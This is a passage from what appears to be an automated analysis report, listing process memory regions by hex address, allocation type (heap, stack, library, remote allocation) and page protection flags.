|
trusted library allocation
|
page read and write
|
||
1B3B49E0000
|
trusted library allocation
|
page read and write
|
||
2405A7B0000
|
trusted library allocation
|
page read and write
|
||
AB297FB000
|
stack
|
page read and write
|
||
1CA57A6D000
|
heap
|
page read and write
|
||
1D3A6AEF000
|
trusted library allocation
|
page read and write
|
||
E8060FE000
|
stack
|
page read and write
|
||
1B3CCE70000
|
heap
|
page read and write
|
||
7FFEBC793000
|
trusted library allocation
|
page execute and read and write
|
||
2465EDBC000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
205308B3000
|
direct allocation
|
page read and write
|
||
1D99E870000
|
heap
|
page read and write
|
||
1D3A6AE0000
|
trusted library allocation
|
page read and write
|
||
121AB381000
|
heap
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
246674EC000
|
trusted library allocation
|
page read and write
|
||
703D000
|
stack
|
page read and write
|
||
20530A24000
|
heap
|
page read and write
|
||
5FA0000
|
trusted library allocation
|
page read and write
|
||
2052EFB2000
|
heap
|
page read and write
|
||
68E18FE000
|
stack
|
page read and write
|
||
5A90000
|
remote allocation
|
page read and write
|
||
7FFEBC866000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
2464F879000
|
trusted library allocation
|
page read and write
|
||
46942F9000
|
stack
|
page read and write
|
||
16F2C7D000
|
stack
|
page read and write
|
||
12AA000
|
heap
|
page read and write
|
||
1D3A6913000
|
heap
|
page read and write
|
||
1D3A6741000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
170BF886000
|
heap
|
page read and write
|
||
7FFEBCB5A000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1C9E3E0D000
|
heap
|
page read and write
|
||
3330000
|
heap
|
page execute and read and write
|
||
5E60000
|
trusted library allocation
|
page read and write
|
||
40E000
|
remote allocation
|
page execute and read and write
|
||
1C9E3EEE000
|
heap
|
page read and write
|
||
2ED70C3C000
|
heap
|
page read and write
|
||
2ED70D00000
|
heap
|
page read and write
|
||
1B3B5822000
|
trusted library allocation
|
page read and write
|
||
24667471000
|
trusted library allocation
|
page read and write
|
||
1CA57A71000
|
heap
|
page read and write
|
||
1CA582D0000
|
remote allocation
|
page read and write
|
||
2ED70BB0000
|
trusted library allocation
|
page read and write
|
||
170BF888000
|
heap
|
page read and write
|
||
61B0000
|
trusted library allocation
|
page read and write
|
||
1C9E2076000
|
heap
|
page read and write
|
||
121AB1F0000
|
heap
|
page read and write
|
||
1D3A6B30000
|
trusted library allocation
|
page read and write
|
||
24667860000
|
trusted library allocation
|
page read and write
|
||
246674E0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9B0000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9E0000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
A8C30FE000
|
stack
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA00000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
E9AAFE000
|
stack
|
page read and write
|
||
1D38C4A0000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
1D9A012B000
|
direct allocation
|
page read and write
|
||
C4269FB000
|
stack
|
page read and write
|
||
2052EF4E000
|
heap
|
page read and write
|
||
7FFEBCA30000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
1B3B4830000
|
heap
|
page execute and read and write
|
||
20531C3B000
|
direct allocation
|
page read and write
|
||
24667530000
|
heap
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
1CA58A03000
|
heap
|
page read and write
|
||
166E000
|
stack
|
page read and write
|
||
1D38C4B0000
|
heap
|
page readonly
|
||
2464D0BB000
|
heap
|
page read and write
|
||
1CA58596000
|
heap
|
page read and write
|
||
1D9A14E0000
|
direct allocation
|
page read and write
|
||
2052EFB0000
|
heap
|
page read and write
|
||
1D3A6711000
|
trusted library allocation
|
page read and write
|
||
1C9E3EFC000
|
heap
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
5E04000
|
trusted library allocation
|
page read and write
|
||
1D3A62C0000
|
trusted library allocation
|
page read and write
|
||
24667471000
|
trusted library allocation
|
page read and write
|
||
1C9E3F5E000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
24667100000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA50000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC30000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
33CC000
|
trusted library allocation
|
page read and write
|
||
1D3A67E0000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB55000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
5E25000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1C9E1FB4000
|
heap
|
page read and write
|
||
2052EF3D000
|
heap
|
page read and write
|
||
6D7E000
|
stack
|
page read and write
|
||
1C9E205F000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1C9E3EE1000
|
heap
|
page read and write
|
||
1B3B4CE9000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1D3A6764000
|
trusted library allocation
|
page read and write
|
||
24667560000
|
heap
|
page read and write
|
||
2521A057000
|
heap
|
page read and write
|
||
1C9E203D000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1C9E3F11000
|
heap
|
page read and write
|
||
1D3A67D0000
|
trusted library allocation
|
page read and write
|
||
2052EF40000
|
heap
|
page read and write
|
||
40E000
|
remote allocation
|
page execute and read and write
|
||
1B3CCF30000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1C9E3F0F000
|
heap
|
page read and write
|
||
1C9E3E0D000
|
heap
|
page read and write
|
||
7DF4F9810000
|
trusted library allocation
|
page execute and read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
1B3B5870000
|
trusted library allocation
|
page read and write
|
||
1C9E3EEE000
|
heap
|
page read and write
|
||
7FFEBC7A3000
|
trusted library allocation
|
page read and write
|
||
14E0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
2052EF51000
|
heap
|
page read and write
|
||
1D38C323000
|
heap
|
page read and write
|
||
7FFEBCA60000
|
trusted library allocation
|
page read and write
|
||
15F0000
|
trusted library allocation
|
page read and write
|
||
2052EF4C000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC992000
|
trusted library allocation
|
page read and write
|
||
5F70000
|
trusted library allocation
|
page read and write
|
||
1D39DEEF000
|
trusted library allocation
|
page read and write
|
||
20531C30000
|
direct allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
15CB0E70000
|
heap
|
page read and write
|
||
1CA58595000
|
heap
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
1C9E3EB6000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
2938B202000
|
trusted library allocation
|
page read and write
|
||
1CA585D6000
|
heap
|
page read and write
|
||
7FFEBC990000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
2B019E00000
|
heap
|
page read and write
|
||
2F50000
|
trusted library allocation
|
page read and write
|
||
7FFEBCB40000
|
trusted library allocation
|
page read and write
|
||
7FFEBCBE0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
68E177F000
|
stack
|
page read and write
|
||
2521A08D000
|
heap
|
page read and write
|
||
1CA5853B000
|
heap
|
page read and write
|
||
1D99E790000
|
heap
|
page read and write
|
||
7FFEBCB9F000
|
trusted library allocation
|
page read and write
|
||
1D3A6880000
|
trusted library allocation
|
page read and write
|
||
2466705C000
|
heap
|
page read and write
|
||
7FFEBC972000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1B3B49D0000
|
trusted library allocation
|
page read and write
|
||
1CA57A50000
|
heap
|
page read and write
|
||
5533AFF000
|
stack
|
page read and write
|
||
1B3B4A20000
|
trusted library allocation
|
page read and write
|
||
3130000
|
trusted library allocation
|
page read and write
|
||
5F90000
|
trusted library allocation
|
page read and write
|
||
1CA58582000
|
heap
|
page read and write
|
||
1602000
|
trusted library allocation
|
page read and write
|
||
2464F58B000
|
trusted library allocation
|
page read and write
|
||
1C9E2003000
|
heap
|
page read and write
|
||
1D99E7FB000
|
heap
|
page read and write
|
||
1C9E3EA1000
|
heap
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D3A67A0000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
24667870000
|
trusted library allocation
|
page read and write
|
||
1C9E1F90000
|
heap
|
page read and write
|
||
1D99E82C000
|
heap
|
page read and write
|
||
16F2FFE000
|
stack
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
7FFEBCAB0000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1C9E3EC4000
|
heap
|
page read and write
|
||
1CA58582000
|
heap
|
page read and write
|
||
1B3CD1F8000
|
heap
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page read and write
|
||
1B3CD20D000
|
heap
|
page read and write
|
||
1CA58A02000
|
heap
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1B3B49C0000
|
remote allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
1C9E3F2D000
|
heap
|
page read and write
|
||
1C9E3FC3000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1CA58584000
|
heap
|
page read and write
|
||
1D3A693F000
|
heap
|
page read and write
|
||
32B6000
|
trusted library allocation
|
page read and write
|
||
7FFEBC840000
|
trusted library allocation
|
page read and write
|
||
2466784F000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA70000
|
trusted library allocation
|
page read and write
|
||
2464FDBC000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
2052EF96000
|
heap
|
page read and write
|
||
7FFEBCA10000
|
trusted library allocation
|
page read and write
|
||
1D3A6B00000
|
trusted library allocation
|
page read and write
|
||
2ED70C4D000
|
heap
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
1B3B580A000
|
trusted library allocation
|
page read and write
|
||
1C9E3EEE000
|
heap
|
page read and write
|
||
7FFEBC79D000
|
trusted library allocation
|
page execute and read and write
|
||
1D99E890000
|
heap
|
page read and write
|
||
20530A20000
|
heap
|
page read and write
|
||
7FFEBCAA0000
|
trusted library allocation
|
page read and write
|
||
1C9E2063000
|
heap
|
page read and write
|
||
1D3A6790000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A6780000
|
trusted library allocation
|
page read and write
|
||
17F303C6000
|
heap
|
page read and write
|
||
C425DFE000
|
stack
|
page read and write
|
||
7FFEBCA47000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
61E2000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
24666F6A000
|
heap
|
page read and write
|
||
3290000
|
trusted library allocation
|
page read and write
|
||
121AB260000
|
heap
|
page read and write
|
||
1D3A6780000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA10000
|
trusted library allocation
|
page read and write
|
||
205308D0000
|
direct allocation
|
page read and write
|
||
1C9E3EEE000
|
heap
|
page read and write
|
||
2052EF2A000
|
heap
|
page read and write
|
||
1B3B4A00000
|
trusted library allocation
|
page read and write
|
||
1CA57A4F000
|
heap
|
page read and write
|
||
1D9A1440000
|
direct allocation
|
page read and write
|
||
246674A1000
|
trusted library allocation
|
page read and write
|
||
68E1CFE000
|
stack
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
5F90000
|
trusted library allocation
|
page read and write
|
||
246674C0000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1D9A1560000
|
direct allocation
|
page read and write
|
||
16F313E000
|
stack
|
page read and write
|
||
246674A1000
|
trusted library allocation
|
page read and write
|
||
1B3B4990000
|
trusted library allocation
|
page read and write
|
||
E9AFFB000
|
stack
|
page read and write
|
||
3091000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1D99E828000
|
heap
|
page read and write
|
||
246671D1000
|
heap
|
page read and write
|
||
1B3B49D0000
|
trusted library allocation
|
page read and write
|
||
1D38C4C0000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A6780000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
2052EF7F000
|
heap
|
page read and write
|
||
1D3A678E000
|
trusted library allocation
|
page read and write
|
||
2464EC3A000
|
trusted library allocation
|
page read and write
|
||
205308CB000
|
direct allocation
|
page read and write
|
||
1B3B49C0000
|
remote allocation
|
page read and write
|
||
2405A8C0000
|
heap
|
page read and write
|
||
2405A570000
|
heap
|
page read and write
|
||
1D99E7FE000
|
heap
|
page read and write
|
||
1CA58595000
|
heap
|
page read and write
|
||
1D3A62E4000
|
trusted library allocation
|
page read and write
|
||
1B3B49F0000
|
trusted library allocation
|
page read and write
|
||
24667840000
|
trusted library allocation
|
page read and write
|
||
1B3CCF1B000
|
heap
|
page read and write
|
||
2405A7E0000
|
trusted library allocation
|
page read and write
|
||
61E0000
|
trusted library allocation
|
page read and write
|
||
1B3CD205000
|
heap
|
page read and write
|
||
17F303AB000
|
heap
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
2ED70C00000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
46EBEFE000
|
stack
|
page read and write
|
||
2ED70C48000
|
heap
|
page read and write
|
||
2B019F02000
|
heap
|
page read and write
|
||
2052EF3A000
|
heap
|
page read and write
|
||
2464D325000
|
heap
|
page read and write
|
||
A8C363E000
|
stack
|
page read and write
|
||
7FFEBC7B3000
|
trusted library allocation
|
page execute and read and write
|
||
2405A600000
|
trusted library allocation
|
page read and write
|
||
1B3B57AE000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
A8C307F000
|
stack
|
page read and write
|
||
4AF8FFF000
|
stack
|
page read and write
|
||
1D3A6780000
|
trusted library allocation
|
page read and write
|
||
7FFEBCBE0000
|
trusted library allocation
|
page read and write
|
||
2405A7C0000
|
heap
|
page readonly
|
||
7FFEBC846000
|
trusted library allocation
|
page read and write
|
||
7FFEBCC40000
|
trusted library allocation
|
page read and write
|
||
1B3CCF69000
|
heap
|
page read and write
|
||
2405A6C1000
|
heap
|
page read and write
|
||
1D38DE10000
|
heap
|
page read and write
|
||
7FFEBC980000
|
trusted library allocation
|
page execute and read and write
|
||
1D99E81B000
|
heap
|
page read and write
|
||
121ACDD0000
|
heap
|
page read and write
|
||
1B3B3070000
|
trusted library allocation
|
page read and write
|
||
24667820000
|
trusted library allocation
|
page read and write
|
||
1C9E3DA2000
|
heap
|
page read and write
|
||
2052EFB2000
|
heap
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
C4266FE000
|
stack
|
page read and write
|
||
7FFEBC850000
|
trusted library allocation
|
page execute and read and write
|
||
170BF88A000
|
heap
|
page read and write
|
||
A1A89FF000
|
stack
|
page read and write
|
||
246674B2000
|
trusted library allocation
|
page read and write
|
||
68E16FE000
|
stack
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
1D39DF2C000
|
trusted library allocation
|
page read and write
|
||
170BF900000
|
heap
|
page read and write
|
||
1CA58590000
|
heap
|
page read and write
|
||
1C9E2054000
|
heap
|
page read and write
|
||
2464D060000
|
heap
|
page read and write
|
||
2464F539000
|
trusted library allocation
|
page read and write
|
||
E9A9FF000
|
stack
|
page read and write
|
||
16C0000
|
trusted library allocation
|
page read and write
|
||
170BF832000
|
heap
|
page read and write
|
||
1C9E1F70000
|
heap
|
page read and write
|
||
24666F6C000
|
heap
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
1D3A6AE0000
|
trusted library allocation
|
page read and write
|
||
2938A800000
|
heap
|
page read and write
|
||
20531C3D000
|
direct allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
24667472000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
1D38C3E0000
|
heap
|
page read and write
|
||
1B3CD1C0000
|
heap
|
page read and write
|
||
F5A91BE000
|
stack
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
20531B30000
|
direct allocation
|
page read and write
|
||
2938AA8F000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
2B019E51000
|
heap
|
page read and write
|
||
1D3A67B0000
|
trusted library allocation
|
page read and write
|
||
E9A309000
|
stack
|
page read and write
|
||
F5A95FB000
|
stack
|
page read and write
|
||
25219FF0000
|
heap
|
page read and write
|
||
1C9E3F26000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
246674B2000
|
trusted library allocation
|
page read and write
|
||
24667850000
|
trusted library allocation
|
page read and write
|
||
7FFEBC8B0000
|
trusted library allocation
|
page execute and read and write
|
||
2EA4000
|
trusted library allocation
|
page read and write
|
||
2A7CE664000
|
heap
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
2052EF41000
|
heap
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
33A1000
|
trusted library allocation
|
page read and write
|
||
5806000
|
trusted library allocation
|
page read and write
|
||
544D000
|
stack
|
page read and write
|
||
2405A8C9000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
12F9000
|
stack
|
page read and write
|
||
2464F577000
|
trusted library allocation
|
page read and write
|
||
2405A8D0000
|
trusted library allocation
|
page read and write
|
||
1B3C4A50000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1C9E3F11000
|
heap
|
page read and write
|
||
1CA57A4D000
|
heap
|
page read and write
|
||
16F2E7E000
|
stack
|
page read and write
|
||
24666FDB000
|
heap
|
page read and write
|
||
7FFEBCB5F000
|
trusted library allocation
|
page read and write
|
||
2B019E79000
|
heap
|
page read and write
|
||
2405A430000
|
heap
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1B3B49F0000
|
trusted library allocation
|
page read and write
|
||
246678C0000
|
trusted library allocation
|
page read and write
|
||
1D99E799000
|
heap
|
page read and write
|
||
2938AA2C000
|
heap
|
page read and write
|
||
1D38DCE0000
|
trusted library allocation
|
page read and write
|
||
5F90000
|
trusted library allocation
|
page read and write
|
||
15F2000
|
trusted library allocation
|
page read and write
|
||
1C9E3F11000
|
heap
|
page read and write
|
||
7FFEBC940000
|
trusted library allocation
|
page read and write
|
||
1C9E3DA5000
|
heap
|
page read and write
|
||
1CA585AC000
|
heap
|
page read and write
|
||
246674E7000
|
trusted library allocation
|
page read and write
|
||
7FFEBCA20000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
1C9E1F50000
|
heap
|
page read and write
|
||
2465EDC6000
|
trusted library allocation
|
page read and write
|
||
46EBF7E000
|
stack
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
68E1D7B000
|
stack
|
page read and write
|
||
1B3B2EBE000
|
heap
|
page read and write
|
||
1D39DEDF000
|
trusted library allocation
|
page read and write
|
||
24667800000
|
trusted library allocation
|
page read and write
|
||
FE0000
|
remote allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
33A7000
|
trusted library allocation
|
page read and write
|
||
1D99E7B9000
|
heap
|
page read and write
|
||
1B3B49E6000
|
trusted library allocation
|
page read and write
|
||
1D99E82D000
|
heap
|
page read and write
|
||
33AF000
|
trusted library allocation
|
page read and write
|
||
16F2BFF000
|
stack
|
page read and write
|
||
15CB0AEB000
|
heap
|
page read and write
|
||
7FFEBCC60000
|
trusted library allocation
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
7FFEBCBA8000
|
trusted library allocation
|
page read and write
|
||
1CA585A8000
|
heap
|
page read and write
|
||
1B3CCE60000
|
heap
|
page execute and read and write
|
||
2F80000
|
heap
|
page execute and read and write
|
||
1D9A15E4000
|
direct allocation
|
page read and write
|
||
20531CF0000
|
direct allocation
|
page read and write
|
||
33BB000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1C9E3EAD000
|
heap
|
page read and write
|
||
1C9E2076000
|
heap
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
24667910000
|
trusted library allocation
|
page read and write
|
||
15FA000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEBCB00000
|
trusted library allocation
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1D99E760000
|
heap
|
page read and write
|
||
1D9A13E0000
|
direct allocation
|
page read and write
|
||
17F302B0000
|
heap
|
page read and write
|
||
1D3A67F0000
|
trusted library allocation
|
page read and write
|
||
400000
|
remote allocation
|
page execute and read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
24667830000
|
trusted library allocation
|
page read and write
|
||
3280000
|
trusted library allocation
|
page read and write
|
||
2464EDDF000
|
trusted library allocation
|
page read and write
|
||
1C9E3E0A000
|
heap
|
page read and write
|
||
1D3A6750000
|
trusted library allocation
|
page read and write
|
||
1B3CCF6C000
|
heap
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9E0000
|
trusted library allocation
|
page read and write
|
||
F73E5FF000
|
stack
|
page read and write
|
||
15CB0AE0000
|
heap
|
page read and write
|
||
1D3A6711000
|
trusted library allocation
|
page read and write
|
||
1CA58560000
|
heap
|
page read and write
|
||
C425EFE000
|
stack
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
1D3A6730000
|
trusted library allocation
|
page read and write
|
||
1CA585A6000
|
heap
|
page read and write
|
||
1C9E3E06000
|
heap
|
page read and write
|
||
24667850000
|
trusted library allocation
|
page read and write
|
||
246678F0000
|
trusted library allocation
|
page read and write
|
||
24667880000
|
trusted library allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
1B3B49A0000
|
trusted library allocation
|
page read and write
|
||
5533BFF000
|
stack
|
page read and write
|
||
121AB331000
|
heap
|
page read and write
|
||
1CA585A6000
|
heap
|
page read and write
|
||
170BF888000
|
heap
|
page read and write
|
||
1D3A6AF0000
|
trusted library allocation
|
page read and write
|
||
C4261FF000
|
stack
|
page read and write
|
||
246678D0000
|
trusted library allocation
|
page read and write
|
||
1CA58A02000
|
heap
|
page read and write
|
||
1C9E3EF4000
|
heap
|
page read and write
|
||
2464EA40000
|
trusted library allocation
|
page read and write
|
||
7FFEBC9F0000
|
trusted library allocation
|
page read and write
|
||
24667490000
|
trusted library allocation
|
page read and write
|
||
126E000
|
stack
|
page read and write
|
||
24667471000
|
trusted library allocation
|
page read and write
|
||
24666F6E000
|
heap
|
page read and write
|
||
2465EDBE000
|
trusted library allocation
|
page read and write
|
||
170BF889000
|
heap
|
page read and write
|
||
61DC000
|
trusted library allocation
|
page read and write
|
||
1C9E1FBA000
|
heap
|
page read and write
|
||
24666FEB000
|
heap
|
page read and write
|
||
1C9E2130000
|
remote allocation
|
page read and write
|
||
170BF88A000
|
heap
|
page read and write
|
||
7FFEBC7B4000
|
trusted library allocation
|
page read and write
|
||
68E17FC000
|
stack
|
page read and write
|
||
2464FA26000
|
trusted library allocation
|
page read and write
|
||
55D0000
|
trusted library allocation
|
page read and write
|
||
3140000
|
heap
|
page read and write
|
||
1D3A6780000
|
trusted library allocation
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
1B3B4854000
|
trusted library allocation
|
page read and write
|
||
2052EFA6000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
1B3CCF4F000
|
heap
|
page read and write
|
||
246674B0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC86C000
|
trusted library allocation
|
page execute and read and write
|
||
1D99E80F000
|
heap
|
page read and write
|
||
1D3A6760000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
1D3A6720000
|
trusted library allocation
|
page read and write
|
||
246671AC000
|
heap
|
page read and write
|
||
5796000
|
trusted library allocation
|
page read and write
|
||
24667470000
|
trusted library allocation
|
page read and write
|
||
7FFEBCAF0000
|
trusted library allocation
|
page read and write
|
||
B98E077000
|
stack
|
page read and write
|
||
7FFEBCB74000
|
trusted library allocation
|
page read and write
|
||
1C9E3F0F000
|
heap
|
page read and write
|
||
1D3A6740000
|
trusted library allocation
|
page read and write
|
||
20531C20000
|
direct allocation
|
page read and write
|
||
2464F587000
|
trusted library allocation
|
page read and write
|
||
121AB305000
|
heap
|
page read and write
|
||
E9ADFE000
|
stack
|
page read and write
|
||
1D9A00D0000
|
direct allocation
|
page read and write
|
||
D9F47B000
|
stack
|
page read and write
|
||
24667043000
|
heap
|
page read and write
|
||
1C9E3F24000
|
heap
|
page read and write
|
||
1D99E7C1000
|
heap
|
page read and write
|
||
1CA5859C000
|
heap
|
page read and write
|
||
5A8E000
|
stack
|
page read and write
|
||
1CA58A20000
|
heap
|
page read and write
|
||
1CA57B16000
|
heap
|
page read and write
|
||
2405A6C1000
|
heap
|
page read and write
|
||
1C9E2054000
|
heap
|
page read and write
|
||
1D3A6770000
|
heap
|
page read and write
|
||
246674A0000
|
trusted library allocation
|
page read and write
|
||
1D3A6797000
|
trusted library allocation
|
page read and write
|
||
246678EC000
|
trusted library allocation
|
page read and write
|
||
1C9E3EFC000
|
heap
|
page read and write
|
||
46943F9000
|
stack
|
page read and write
|
||
4359000
|
trusted library allocation
|
page read and write
|
||
24667130000
|
trusted library allocation
|
page read and write
|
||
1CA585BB000
|
heap
|
page read and write
|
||
246674F0000
|
trusted library allocation
|
page read and write
|
||
40E000
|
remote allocation
|
page execute and read and write
|
||
1D99E81A000
|
heap
|
page read and write
|
||
1B3B54AB000
|
trusted library allocation
|
page read and write
|
||
2B019E3C000
|
heap
|
page read and write
|
||
1D3A67B0000
|
trusted library allocation
|
page read and write
|
||
7FFEBC964000
|
trusted library allocation
|
page read and write
|
||
1B3CCF30000
|
heap
|
page read and write
|
||
1D99E620000
|
heap
|
page read and write
|
||
1D38DE89000
|
trusted library allocation
|
page read and write
|
||
1D3A6710000
|
trusted library allocation
|
page read and write
|
||
2052EFA4000
|
heap
|
page read and write
|
||
1CA582D0000
|
remote allocation
|
page read and write
|
||
2938AA29000
|
heap
|
page read and write
|
||
20531C50000
|
direct allocation
|
page read and write
|
||
5F80000
|
trusted library allocation
|
page read and write
|
||
24667480000
|
trusted library allocation
|
page read and write
|
||
